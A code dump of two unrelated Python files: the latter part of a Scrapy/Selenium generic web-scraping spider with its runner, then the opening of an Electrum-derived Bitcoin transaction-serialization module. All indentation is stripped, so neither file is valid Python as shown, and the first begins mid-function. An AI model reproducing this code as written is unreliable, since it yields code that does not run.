# log_scrap.debug(u"--- GenericSpider. / VARIABLES - spider_name : '%s' - item n°%s " %(self.spider_name, self.item_count) )
### check if can continue depending on item_count
if self.settings_limit_items == 0 or self.item_count <= self.settings_limit_items :
log_scrap.debug(u">>> NEW ITEM - spider_name : '%s' >>>" %(self.spider_name) )
log_scrap.debug(u">>> NEW ITEM - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEW ITEM - current start_url : {} >>>".format(start_url) )
log_scrap.debug(u">>> NEW ITEM - Selenium - item n°{} / page n°{} >>> \n".format(self.item_count, self.page_count) )
### instantiate Item to fill from datamodel --> cf items.py
itemclass = create_item_class( 'GenericItemClass', fields_list = self.dm_item_related )
item = itemclass()
### add global info to item : i.e. core fields in dm_core_item_related list
item[ 'spider_id' ] = self.spider_id
item[ 'added_by' ] = self.user_id
item[ 'added_at' ] = time.time() # timestamp
item[ 'link_src' ] = response._url
item[ 'page_n' ] = self.page_count
item[ 'item_n' ] = self.item_count
### extract data and feed it to the Item instance based on spider_config_flat
item = self.fill_item_from_results_page(raw_data, item, is_reactive=True, strings_to_clean=strings_to_clean, item_n=self.item_count )
### - - - - - - - - - - ###
### FOLLOW LINK - SELENIUM
### find follow link to open detailled item view
if self.spider_config_flat["parse_follow"] == True :
log_scrap.debug(u">>> FOLLOW LINK - SELENIUM - item n°{} / page n°{} >>>>>> \n".format(self.item_count, self.page_count) )
log_scrap.info("--- GenericSpider. / self.follow_xpath : %s", self.follow_xpath )
### follow link with Scrapy
try :
log_scrap.debug(u"--- GenericSpider. / follow link with Scrapy ..." )
# log_scrap.debug(u"--- GenericSpider. / get href of follow_link ..." )
follow_link_xpath = clean_xpath_for_reactive(self.follow_xpath, strings_to_clean)
log_scrap.info(" --> follow_link_xpath : %s ", follow_link_xpath )
follow_link = raw_data.find_element_by_xpath( follow_link_xpath ).get_attribute('href')
log_scrap.info(" --> follow_link RAW : %s ", follow_link )
url_follow = ""
if self.api_follow_root != "" :
url_follow = self.api_follow_root
# complete follow link if needed
follow_link = self.clean_link(follow_link, url_root=url_follow)
log_scrap.info(" --> follow_link CLEAN ({}) : {}".format(type(follow_link), follow_link ) )
# store follow_link
item[ 'link_data' ] = follow_link
url = item['link_data']
try :
log_scrap.warning(u">>> FOLLOWING LINK --> url : {} ".format(url) )
yield scrapy.Request(url, callback=self.parse_detailed_page, meta={'item': item, 'start_url' : start_url , 'item_n' : self.item_count , 'parse_api' : False})
except :
log_scrap.warning(u">>> FOLLOW LINK - NOT WORKING : {} ".format(url) )
yield item
### follow link with Selenium
### FIND A WEBSITE TEST FOR REACTIVE DETAILLED PAGES
except :
log_scrap.debug(u"--- GenericSpider. / follow link with Selenium ..." )
follow_link_xpath = clean_xpath_for_reactive(self.follow_xpath, strings_to_clean)
log_scrap.info("--- GenericSpider. / self.follow_link_xpath : %s", self.follow_link_xpath )
follow_link = raw_data.find_element_by_xpath( follow_link_xpath )
### open link in new tab ?
follow_link.click()
### get data and save data
try :
log_scrap.debug(u"--- GenericSpider. / get data and save data ..." )
item = self.fill_item_from_results_page(raw_data, item, is_reactive=True, strings_to_clean=strings_to_clean, item_n=self.item_count )
### back to previous page and scrap from where it left
### cf : https://selenium-python.readthedocs.io/navigating.html#navigation-history-and-location
self.driver.back()
yield item
except :
yield item
### if no follow link
else :
yield item
# log_scrap.info(" --> item : \n %s \n", pformat(item) )
log_scrap.debug(u" --> item ..." )
else :
self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF LIMIT_ITEMS - items count : {} - LIMIT_ITEMS : {} / except -> break".format(self.item_count, self.LIMIT_ITEMS) )
self.driver.close()
log_scrap.info("--- GenericSpider / driver is shut" )
raise CloseSpider('OUT OF LIMIT_ITEMS')
break
else :
self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF ITEMS - page n°{} - limit : {} - test_limit : {} / except -> break".format(self.page_count, self.settings_limit_pages, self.test_limit) )
self.driver.close()
log_scrap.info("--- GenericSpider / driver is shut" )
# raise CloseSpider('OUT OF TEST_LIMIT')
break
### - - - - - - - - - - - - ###
### NEXT PAGE - SELENIUM
if self.test_limit == None or self.page_count < self.test_limit :
if self.there_is_more_items_to_scrap_dict[start_url] :
if self.page_count < self.settings_limit_pages or self.settings_limit_pages == 0 :
print ()
log_scrap.debug(u">>> NEXT PAGE - spider_name : '%s' >>>" %(self.spider_name) )
log_scrap.info(" --- GenericSpider.parse (Selenium) >>> PAGE n°{} DONE -> NEXT PAGE >>> \n".format(self.page_count) )
### add +1 to parsed pages
self.page_count += 1
log_scrap.debug(u">>> NEXT PAGE - spider_page_url : {} >>>".format(self.spider_page_url) )
log_scrap.debug(u">>> NEXT PAGE - current start_url : {} >>>".format(start_url) )
### find next page btn in current view
log_scrap.info("--- GenericSpider. / self.next_page : %s", self.next_page )
next_page_xpath = clean_xpath_for_reactive(self.next_page, strings_to_clean)
log_scrap.info("--- GenericSpider. / next_page_xpath : %s", next_page_xpath )
# next_page = re.sub("|".join(strings_to_clean), "", next_page )
# try :
# element_present = EC.presence_of_element_located((By.XPATH, next_page_xpath ))
# log_scrap.info("--- GenericSpider. / next_page present : %s", element_present )
# self.wait.until(element_present)
# next_page = self.wait.until( EC.element_to_be_clickable(element_present) )
# next_page = self.driver.find_element_by_xpath( next_page_xpath )
next_page = self.driver.find_element(By.XPATH, next_page_xpath )
log_scrap.info("--- GenericSpider. / next_page : %s", next_page )
log_scrap.info("--- GenericSpider. / next_page.text : %s", next_page.text )
# except TimeoutException:
# except :
# log_scrap.error("--- GenericSpider. / Timed out waiting for page to load")
### click next button and wait for ajax calls to complete (post and get)
### cf : http://www.obeythetestinggoat.com/how-to-get-selenium-to-wait-for-page-load-after-a-click.html
# def wait_for(condition_function):
# start_time = time.time()
# while time.time() < start_time + 3:
# if condition_function():
# return True
# else:
# time.sleep(0.1)
# raise Exception ('Timeout waiting for {}'.format(condition_function.__name__) )
# def link_has_gone_stale():
# try:
# # poll the link with an arbitrary call
# next_page.find_elements_by_xpath(self.item_xpath)
# return False
# except StaleElementReferenceException :
# return True
log_scrap.debug(u"--- ... ---")
try :
log_scrap.info("--- GenericSpider. / next_page.click() " )
next_page.click()
except :
# log_scrap.info("--- GenericSpider. / next_page.send_keys( \ n )" )
# next_page.send_keys("\n")
# added this step for compatibility of scrolling to the view
log_scrap.error("--- GenericSpider. / ALTERNATIVE next_page.click() " )
# self.driver.execute_script("return arguments[0].scrollIntoView();", next_page)
# next_page.click()
self.driver.execute_script("arguments[0].click();", next_page)
### wait after click
try :
log_scrap.info("--- GenericSpider. / wait for ajax to finish... " )
# wait_for(link_has_gone_stale)
self.wait_page.until(lambda driver: self.driver.execute_script('return jQuery.active') == 0)
self.wait_page.until(lambda driver: self.driver.execute_script('return document.readyState') == 'complete')
# time.sleep(self.delay_implicit)
time.sleep(self.delay_new_page)
except :
log_scrap.error("--- GenericSpider. / !!! FAIL / wait for ajax to finish... " )
else :
# self.there_is_more_items_to_scrap = False
self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF PAGES TO SCRAP - page n°{} / except -> break".format(self.page_count) )
self.driver.close()
raise CloseSpider('OUT OF PAGES TO SCRAP')
break
else :
# self.there_is_more_items_to_scrap = False
self.there_is_more_items_to_scrap_dict[start_url] = False
log_scrap.warning(u"--- GenericSpider. / OUT OF TEST_LIMIT - page n°{} - limit : {} - test_limit : {} / except -> break".format(self.page_count, self.settings_limit_pages, self.test_limit) )
self.driver.close()
log_scrap.info("--- GenericSpider / driver is shut" )
# raise CloseSpider('OUT OF TEST_LIMIT')
break
except :
log_scrap.warning(u"--- GenericSpider. / NO MORE ITEMS TO SCRAP - item_count : {} - LIMIT_ITEMS : {} / except -> break".format(self.item_count, self.LIMIT_ITEMS) )
self.driver.close()
log_scrap.info("--- GenericSpider / driver is shut" )
raise CloseSpider('NO MORE ITEMS TO SCRAP')
break
### generic function to fill item from result
def fill_item_from_results_page (self,
raw_data, item,
is_reactive=False,
is_api_rest=False,
strings_to_clean=None,
item_n=""
) :
""" fill item """
# log_scrap.debug(u" -+- fill_item_from_results_page " )
log_scrap.debug(u" -+- fill_item_from_results_page : item n°{}".format( item_n ) )
# log_scrap.info(" -+- item : \n %s \n", pformat(item) )
# log_scrap.info(" -+- raw_data : \n %s \n", pformat(raw_data) )
### extract data and feed it to Item instance based on spider_config_flat
for dm_field in self.dm_custom_list :
### first, checks if xpath exists in spider_config_flat
if dm_field in self.spider_config_flat :
### check if field filled in spider_config_flat is not empty
if self.spider_config_flat[ dm_field ] != [] and self.spider_config_flat[ dm_field ] != "" :
full_data = None
# dm_name = str( self.dm_custom[dm_field]["field_name"] )
dm_name = self.dm_custom[dm_field]["field_name"]
dm_type = self.dm_custom[dm_field]["field_type"]
# dm_name = dm_field[u"field_name"]
# dm_type = dm_field[u"field_type"]
# log_scrap.info(" -+- extract / dm_name : %s ", dm_name )
### fill item field corresponding to xpath
item_field_xpath = self.spider_config_flat[ dm_field ]
### extract data with Scrapy request
if is_reactive == False and is_api_rest == False :
try :
# log_scrap.debug(u" -+- extract / with Scrapy ... " )
# log_scrap.info(" -+- extract / item_field_xpath : {} ".format(item_field_xpath ))
log_scrap.debug(u" -+- extract Scrapy / dm_name : %s - item_field_xpath : %s " %(dm_name, item_field_xpath ))
full_data = raw_data.xpath( item_field_xpath ).extract()
except :
log_scrap.error(" -+- !!! extract FAILED / with Scrapy ... " )
### extract data for API REST scraper with Scrapy request
elif is_reactive == False and is_api_rest == True :
log_scrap.info(" -+- extract API / dm_name : %s - item_field_xpath : %s " %(dm_name, item_field_xpath ))
### try extracting from a JSON
try :
full_data = get_dictvalue_from_xpath(raw_data, item_field_xpath)
if type(full_data) != list :
print ()
full_data = [ full_data ]
except :
pass
### extract data with Selenium
else :
try :
# log_scrap.debug(u" -+- extract / with Selenium ... " )
# item_field_xpath = re.sub("|".join(strings_to_clean), "", item_field_xpath )
item_field_xpath = clean_xpath_for_reactive(item_field_xpath, strings_to_clean)
# log_scrap.info(" -+- extract / item_field_xpath : {} ".format(item_field_xpath ))
log_scrap.info(" -+- extract Selenium / dm_name : %s - item_field_xpath : %s " %(dm_name, item_field_xpath ))
# element_present = EC.presence_of_element_located((By.XPATH, item_field_xpath ))
# log_scrap.info(" -+- extract / item_field_xpath present : %s ", element_present )
# try :
# WebDriverWait(self.driver, self.delay_item).until(element_present)
full_data_list = raw_data.find_elements_by_xpath( item_field_xpath )
if dm_type == "url" :
full_data = [ data.get_attribute('href') for data in full_data_list ]
elif dm_type == "image" :
full_data = [ data.get_attribute('src') for data in full_data_list ]
elif dm_type == "date" :
full_data = [ data.get_attribute('datetime') for data in full_data_list ]
elif dm_type == "email" :
full_data = [ data.get_attribute('mailto') for data in full_data_list ]
elif dm_type == "integer" :
full_data = [ int(data.text) for data in full_data_list ]
elif dm_type == "float" :
full_data = [ float(data.text) for data in full_data_list ]
else :
full_data = [ data.text for data in full_data_list ]
# log_scrap.info(" -+- extract / full_data : %s ", full_data )
# except TimeoutException:
# log_scrap.error("-+- extract FAILED / Timed out waiting for page to load")
except :
log_scrap.error(" -+- !!! extract FAILED / with Selenium ... " )
# log_scrap.warning(
# " \n field_name : {} \n item_field_xpath : {} \n dm_field : {} \n full_data : ... ".format(
# self.dm_custom[dm_field]["field_name"],
# item_field_xpath,
# dm_field,
# # full_data
# )
# )
# check if data exists at all
if full_data != None and full_data != [] and full_data != [u""] :
# log_scrap.debug(u" -+- extract / full_data ..." )
### clean data from break lines etc...
full_data = self.clean_data_list(full_data)
# log_scrap.info(" -+- extract / full_data : %s ", full_data )
### in case data needs cleaning before storing
if self.dm_custom[dm_field]["field_type"] in ["url", "image"] :
clean_href_list = []
for data in full_data :
if data != None or data != u"" :
data = self.clean_link(data)
clean_href_list.append(data)
full_data = clean_href_list
# delete duplicates and aggregate
if full_data != None or full_data != [] or full_data != [u""] :
# delete duplicates
full_data_uniques = set(full_data)
full_data_clean = list(full_data_uniques)
# aggregate to existing results
if dm_field in item :
item[ dm_field ] = item[ dm_field ] + full_data_clean
else :
item[ dm_field ] = full_data_clean
log_scrap.warning(u">>> item n°{} - page n°{} >>> END OF : fill_item_from_results_page >>>".format( item_n, self.page_count))
# log_scrap.warning(u"\n %s \n", pformat(item))
return item
### go to follow link and retrieve remaining data for Item
def parse_detailed_page (self, response) :
""" parse_detailed_page """
log_scrap.info(" === GenericSpider / spider_name : '%s' - parse_detailed_page I : %s" %(self.spider_name, response._url) )
item = response.meta["item"]
item_n = response.meta["item_n"]
start_url = response.meta["start_url"]
parse_api = response.meta["parse_api"]
# log_scrap.info(" === GenericSpider / parse_detailed_page I / item_n : {} - page_n : {} ".format(item_n, page_n) )
# if self.there_is_more_items_to_scrap_dict[start_url] :
# if self.there_is_more_items_to_scrap :
log_scrap.info(" === GenericSpider / parse_detailed_page II / item_n : {} - start_url : {} ".format(item_n, start_url) )
# log_scrap.debug(u" === GenericSpider / parse_detailed_page II / spider_name : '%s' - start_url : %s - item n°%s " %(self.spider_name, start_url, self.item_count) )
# log_scrap.debug(u" === GenericSpider / VARIABLES - item n°{} - there_is_more_items_to_scrap_dict[start_url] : {} ".format(self.item_count, self.there_is_more_items_to_scrap_dict[start_url]) )
# log_scrap.debug(u" === GenericSpider / VARIABLES - spider_name : {} - item n°{} - there_is_more_items_to_scrap_dict[start_url] : {} ".format(self.spider_name, self.item_count, self.there_is_more_items_to_scrap_dict[start_url]) )
item = self.fill_item_from_results_page(response, item, item_n=item_n, is_api_rest=parse_api)
yield item
### follow up and callbacks
def get_next_page(self, response, start_url):
"""
tries to find a new page to scrap.
if it finds one, returns it along with a True value
"""
# start_url = response.meta["start_url"]
log_scrap.info(" === GenericSpider / get_next_page / spider_name : '%s' " %(self.spider_name) )
log_scrap.debug(u"=== GenericSpider / VARIABLES - item n°{} - there_is_more_items_to_scrap_dict[start_url] : {} ".format(self.item_count, self.there_is_more_items_to_scrap_dict[start_url]) )
try :
next_page = response.xpath(self.next_page).extract_first()
except :
next_page = None
log_scrap.info(" === GenericSpider.get_next_page / next_page I : %s ", next_page )
if (next_page is not None) and (self.page_count < self.settings_limit_pages ) :
log_scrap.info(" === GenericSpider.get_next_page / self.spider_config_flat['next_page'] : %s ", self.spider_config_flat[ "next_page" ] )
# self.page_count += 1
# next_page = next_page.strip()
# next_page = self.add_string_to_complete_url_if_needed(next_page, self.page_url)
try :
next_page = response.xpath(self.spider_config_flat[ "next_page" ]).extract_first()
log_scrap.info(" === GenericSpider.get_next_page / next_page II : %s ", next_page )
return True, next_page
except:
return False, next_page
else:
return False, next_page
### clean a link if http is missing
def clean_link(self, link=None, url_root=""):
""" complete a link if needed """
if link == None :
link = ""
### erase all spaces in original link
link = ' '.join(link.split())
link = link.replace(" ","").replace('\n', '').replace('\r', '')
### get url_root if needed
if url_root == "" :
url_root_ = self.page_url
else :
url_root_ = url_root
### checks if link is an email
if "@" in link :
if link.startswith("mailto") or link.startswith("http") or link.startswith("/") :
pass
else :
link = "mailto:" + link
elif not link.startswith("http"):
separator = ""
if not link.startswith("/") and url_root == "" :
separator = "/"
link = "{}{}{}".format( url_root_, separator, link)
### DEBUG --> for instance Prix de l'Innovation Urbaine / escape and unicode follow_link
### escape URL encoding
# link = unquote(link)
# log_scrap.debug(u" === clean_link / link (%s): %s", (type(link), link) )
return unicode(link)
### clean data from trailing spaces, multiple spaces, line breaks, etc...
def clean_data_list(self, data_list, chars_to_strip = STRIP_STRING ):
""" clean data list from trailing """
clean_data_list = []
for data in data_list :
# replace multiple spaces
data = ' '.join(data.split())
# remove line breaks
if data in DATA_CONTENT_TO_IGNORE :
pass
else :
data = data.strip(chars_to_strip)
clean_data_list.append(data)
return clean_data_list
### + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + ###
### SPIDER RUNNER ###########################################################################
### + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + ###
### define the spider runner
### cf : https://stackoverflow.com/questions/13437402/how-to-run-scrapy-from-within-a-python-script
### cf : https://doc.scrapy.org/en/latest/topics/practices.html
### solution chosen from : https://stackoverflow.com/questions/41495052/scrapy-reactor-not-restartable
def run_generic_spider( user_id = None,
spider_id = None,
datamodel = None,
run_spider_config = None,
test_limit = None
):
"""
just launch run_generic_spider() from any handler in controller
"""
print ()
log_scrap.info("--- run_generic_spider / spider_id : %s ", spider_id )
### WARNING !!! --> TEMPORARY SOLUTION
### remove spider folder for spider_id in JOBDIR
log_scrap.debug(u"--- run_generic_spider / cwd : %s", os.getcwd() )
try :
shutil.rmtree( os.getcwd() + "/" + JOBDIR_FOLDER + "/" + spider_id )
except:
pass
log_scrap.debug(u"--- run_generic_spider / removed folder : {}/{}".format(JOBDIR_FOLDER, spider_id) )
# !!! spider is launched from main.py level !!!
# all relative routes referring to this...
log_scrap.info("--- run_generic_spider / os.getcwd() : %s ", os.getcwd() )
### flattening run_spider_config : from nested to flat dict
log_scrap.info("--- run_generic_spider / 'flattenSpiderConfig()' on 'run_spider_config' --> 'spider_config_flat' ..." )
spider_config_flat = flattenSpiderConfig( run_spider_config )
### settings for crawler
# cf : https://hackernoon.com/how-to-crawl-the-web-politely-with-scrapy-15fbe489573d
### global settings for scrapy processes (see upper)
log_scrap.info("--- run_generic_spider / BOT_NAME : %s ", settings.get('BOT_NAME') )
log_scrap.info("--- run_generic_spider / USER_AGENT : %s ", settings.get('USER_AGENT') )
log_scrap.info("--- run_generic_spider / ITEM_PIPELINES : %s ", settings.get('ITEM_PIPELINES').__dict__ )
# specific settings for this scrapy process
# settings.set( "RETRY_TIMES" , RETRY_TIMES )
# settings.set( "CONCURRENT_ITEMS" , CONCURRENT_ITEMS )
# settings.set( "CONCURRENT_REQUESTS" , CONCURRENT_REQUESTS )
# settings.set( "CONCURRENT_REQUESTS_PER_DOMAIN" , CONCURRENT_REQUESTS_PER_DOMAIN )
# settings.set( "REDIRECT_MAX_TIMES" , REDIRECT_MAX_TIMES )
# settings.set( "DOWNLOAD_MAXSIZE" , DOWNLOAD_MAXSIZE )
# settings.set( "DEPTH_PRIORITY" , DEPTH_PRIORITY )
# settings.set( "SCHEDULER_DISK_QUEUE" , SCHEDULER_DISK_QUEUE )
# settings.set( "DEPTH_PRIORITY" , SCHEDULER_MEMORY_QUEUE )
# settings.set( "RANDOMIZE_DOWNLOAD_DELAY" , RANDOMIZE_DOWNLOAD_DELAY )
# cf : https://doc.scrapy.org/en/latest/topics/jobs.html#job-directory
settings.set( "JOBDIR" , JOBDIR_FOLDER + "/" + spider_id )
## https://scrapy.readthedocs.io/en/0.12/topics/extensions.html#module-scrapy.contrib.closespider
settings.set( "CURRENT_SPIDER_ID" , spider_id )
settings.set( "RETRY_TIMES" , spider_config_flat["RETRY_TIMES"] )
settings.set( "CLOSESPIDER_ITEMCOUNT" , spider_config_flat["LIMIT_ITEMS"] )
# settings.set( "CLOSESPIDER_PAGECOUNT" , spider_config_flat["LIMIT_PAGES"] )
settings.set( "DOWNLOAD_DELAY" , spider_config_flat["download_delay"] )
settings.set( "CONCURRENT_ITEMS" , spider_config_flat["CONCURRENT_ITEMS"] )
settings.set( "CONCURRENT_REQUESTS" , spider_config_flat["CONCURRENT_REQUESTS"] )
# settings.set( "DOWNLOAD_DELAY" , DOWNLOAD_DELAY )
settings.set( "BOT_NAME" , spider_config_flat["BOT_NAME"] )
settings.set( "USER_AGENT" , spider_config_flat["USER_AGENT"] )
settings.set( "ROBOTSTXT_OBEY" , spider_config_flat["ROBOTSTXT_OBEY"] )
settings.set( "AUTOTHROTTLE_ENABLED" , spider_config_flat["AUTOTHROTTLE_ENABLED"] )
settings.set( "HTTPCACHE_ENABLED" , spider_config_flat["HTTPCACHE_ENABLED"] )
settings.set( "RANDOMIZE_DOWNLOAD_DELAY" , spider_config_flat["RANDOMIZE_DOWNLOAD_DELAY"] )
### initiating crawler process
log_scrap.info("--- run_generic_spider / instanciate process ..." )
process = CrawlerRunner( settings = settings )
### adding CrawlerRunner as deferred
def f(q):
try:
### send/create custom spider from run_spider_config
### cf : https://stackoverflow.com/questions/35662146/dynamic-spider-generation-with-scrapy-subclass-init-error
deferred = process.crawl( GenericSpider,
user_id = user_id,
datamodel = datamodel ,
spider_id = spider_id ,
spider_config_flat = spider_config_flat,
test_limit = test_limit
)
deferred.addBoth(lambda _: reactor.stop())
reactor.run()
q.put(None)
except Exception as e:
q.put(e)
### putting task in queue and start
q = Queue()
p = Process(target=f, args=(q,))
p.start()
result = q.get()
p.join()
if result is not None:
raise result
print ("\n\n{}\n".format("> > > "*20))
#############################################
### cool snippets
### convert to class object
# spider = globals()[spider]
|
transaction.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Note: The deserialization code originally comes from ABE.
from .util import print_error, profiler
from .caches import ExpiringCache
from .bitcoin import *
from .address import (PublicKey, Address, Script, ScriptOutput, hash160,
UnknownAddress, OpCodes as opcodes,
P2PKH_prefix, P2PKH_suffix, P2SH_prefix, P2SH_suffix)
from . import schnorr
from . import util
import struct
import warnings
#
# Workalike python implementation of Bitcoin's CDataStream class.
#
from .keystore import xpubkey_to_address, xpubkey_to_pubkey
NO_SIGNATURE = 'ff'
class SerializationError(Exception):
""" Thrown when there's a problem deserializing or serializing """
class InputValueMissing(ValueError):
""" thrown when the value of an input is needed but not present """
class BCDataStream(object):
def __init__(self):
self.input = None
self.read_cursor = 0
def clear(self):
self.input = None
self.read_cursor = 0
def write(self, _bytes): # Initialize with string of _bytes
if self.input is None:
self.input = bytearray(_bytes)
else:
self.input += bytearray(_bytes)
def read_string(self, encoding='ascii'):
# Strings are encoded depending on length:
# 0 to 252 : 1-byte-length followed by bytes (if any)
# 253 to 65,535 : byte'253' 2-byte-length followed by bytes
# 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes
# ... and the Bitcoin client is coded to understand:
# greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string
# ... but I don't think it actually handles any strings that big.
if self.input is None:
raise SerializationError("call write(bytes) before trying to deserialize")
length = self.read_compact_size()
return self.read_bytes(length).decode(encoding)
def write_string(self, string, encoding='ascii'):
string = to_bytes(string, encoding)
# Length-encoded as with read-string
self.write_compact_size(len(string))
self.write(string)
def read_bytes(self, length):
try:
result = self.input[self.read_cursor:self.read_cursor+length]
self.read_cursor += length
return result
except IndexError:
raise SerializationError("attempt to read past end of buffer")
return ''
def can_read_more(self) -> bool:
if not self.input:
return False
return self.read_cursor < len(self.input)
def read_boolean(self): return self.read_bytes(1)[0] != chr(0)
def read_int16(self): return self._read_num('<h')
def read_uint16(self): return self._read_num('<H')
def read_int32(self): return self._read_num('<i')
def read_uint32(self): return self._read_num('<I')
def read_int64(self): return self._read_num('<q')
def read_uint64(self): return self._read_num('<Q')
def write_boolean(self, val): return self.write(chr(1) if val else chr(0))
def write_int16(self, val): return self._write_num('<h', val)
def write_uint16(self, val): return self._write_num('<H', val)
def write_int32(self, val): return self._write_num('<i', val)
def write_uint32(self, val): return self._write_num('<I', val)
def write_int64(self, val): return self._write_num('<q', val)
def write_uint64(self, val): return self._write_num('<Q', val)
def read_compact_size(self):
try:
size = self.input[self.read_cursor]
self.read_cursor += 1
if size == 253:
size = self._read_num('<H')
elif size == 254:
size = self._read_num('<I')
elif size == 255:
size = self._read_num('<Q')
return size
except IndexError:
raise SerializationError("attempt to read past end of buffer")
def write_compact_size(self, size):
if size < 0:
raise SerializationError("attempt to write size < 0")
elif size < 253:
self.write(bytes([size]))
elif size < 2**16:
self.write(b'\xfd')
self._write_num('<H', size)
elif size < 2**32:
self.write(b'\xfe')
self._write_num('<I', size)
elif size < 2**64:
self.write(b'\xff')
self._write_num('<Q', size)
def _read_num(self, format):
try:
(i,) = struct.unpack_from(format, self.input, self.read_cursor)
self.read_cursor += struct.calcsize(format)
except Exception as e:
raise SerializationError(e)
return i
def _write_num(self, format, num):
s = struct.pack(format, num)
self.write(s)
# This function comes from bitcointools, bct-LICENSE.txt.
def long_hex(bytes):
return bytes.encode('hex_codec')
# This function comes from bitcointools, bct-LICENSE.txt.
def short_hex(bytes):
t = bytes.encode('hex_codec')
if len(t) < 11:
return t
return t[0:4]+"..."+t[-4:]
def script_GetOp(_bytes):
i = 0
blen = len(_bytes)
while i < blen:
vch = None
opcode = _bytes[i]
i += 1
if opcode <= opcodes.OP_PUSHDATA4:
nSize = opcode
if opcode == opcodes.OP_PUSHDATA1:
nSize = _bytes[i] if i < blen else 0
i += 1
elif opcode == opcodes.OP_PUSHDATA2:
(nSize,) = struct.unpack_from('<H', _bytes, i) if i+2 <= blen else (0,) # tolerate truncated script
i += 2
elif opcode == opcodes.OP_PUSHDATA4:
(nSize,) = struct.unpack_from('<I', _bytes, i) if i+4 <= blen else (0,)
i += 4
vch = _bytes[i:i + nSize] # array slicing here never throws exception even if truncated script
i += nSize
yield opcode, vch, i
def script_GetOpName(opcode):
return (opcodes.whatis(opcode)).replace("OP_", "")
def decode_script(bytes):
result = ''
for (opcode, vch, i) in script_GetOp(bytes):
if len(result) > 0: result += " "
if opcode <= opcodes.OP_PUSHDATA4:
result += "%d:"%(opcode,)
result += short_hex(vch)
else:
result += script_GetOpName(opcode)
return result
def match_decoded(decoded, to_match):
if len(decoded) != len(to_match):
return False;
for i in range(len(decoded)):
if to_match[i] == opcodes.OP_PUSHDATA4 and decoded[i][0] <= opcodes.OP_PUSHDATA4 and decoded[i][0]>0:
continue # Opcodes below OP_PUSHDATA4 all just push data onto stack, and are equivalent.
if to_match[i] != decoded[i][0]:
return False
return True
def parse_sig(x_sig):
return [None if x == NO_SIGNATURE else x for x in x_sig]
def safe_parse_pubkey(x):
try:
return xpubkey_to_pubkey(x)
except:
return x
def parse_scriptSig(d, _bytes):
try:
decoded = list(script_GetOp(_bytes))
except Exception as e:
# coinbase transactions raise an exception
print_error("cannot find address in input script", bh2u(_bytes))
return
# added to suppress print_error statements during lib/test_slp_consensus.py (uses 'fake' transactions that have empty scriptSig)
if len(decoded) == 0:
return
match = [ opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
item = decoded[0][1]
# payto_pubkey
d['type'] = 'p2pk'
d['signatures'] = [bh2u(item)]
d['num_sig'] = 1
d['x_pubkeys'] = ["(pubkey)"]
d['pubkeys'] = ["(pubkey)"]
return
# non-generated TxIn transactions push a signature
# (seventy-something bytes) and then their public key
# (65 bytes) onto the stack:
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
sig = bh2u(decoded[0][1])
x_pubkey = bh2u(decoded[1][1])
try:
signatures = parse_sig([sig])
pubkey, address = xpubkey_to_address(x_pubkey)
except:
print_error("cannot find address in input script", bh2u(_bytes))
return
d['type'] = 'p2pkh'
d['signatures'] = signatures
d['x_pubkeys'] = [x_pubkey]
d['num_sig'] = 1
d['pubkeys'] = [pubkey]
d['address'] = address
return
# p2sh transaction, m of n
match = [ opcodes.OP_0 ] + [ opcodes.OP_PUSHDATA4 ] * (len(decoded) - 1)
if not match_decoded(decoded, match):
print_error("cannot find address in input script", bh2u(_bytes))
return
x_sig = [bh2u(x[1]) for x in decoded[1:-1]]
m, n, x_pubkeys, pubkeys, redeemScript = parse_redeemScript(decoded[-1][1])
# write result in d
d['type'] = 'p2sh'
d['num_sig'] = m
d['signatures'] = parse_sig(x_sig)
d['x_pubkeys'] = x_pubkeys
d['pubkeys'] = pubkeys
d['redeemScript'] = redeemScript
d['address'] = Address.from_P2SH_hash(hash160(redeemScript))
def parse_redeemScript(s):
dec2 = [ x for x in script_GetOp(s) ]
# the following throw exception when redeemscript has one or zero opcodes
m = dec2[0][0] - opcodes.OP_1 + 1
n = dec2[-2][0] - opcodes.OP_1 + 1
op_m = opcodes.OP_1 + m - 1
op_n = opcodes.OP_1 + n - 1
match_multisig = [ op_m ] + [opcodes.OP_PUSHDATA4]*n + [ op_n, opcodes.OP_CHECKMULTISIG ]
if not match_decoded(dec2, match_multisig):
# causes exception in caller when mismatched
print_error("cannot find address in input script", bh2u(s))
return
x_pubkeys = [bh2u(x[1]) for x in dec2[1:-2]]
pubkeys = [safe_parse_pubkey(x) for x in x_pubkeys]
redeemScript = Script.multisig_script(m, [bytes.fromhex(p)
for p in pubkeys])
return m, n, x_pubkeys, pubkeys, redeemScript
def get_address_from_output_script(_bytes):
scriptlen = len(_bytes)
if scriptlen == 23 and _bytes.startswith(P2SH_prefix) and _bytes.endswith(P2SH_suffix):
# Pay-to-script-hash
return TYPE_ADDRESS, Address.from_P2SH_hash(_bytes[2:22])
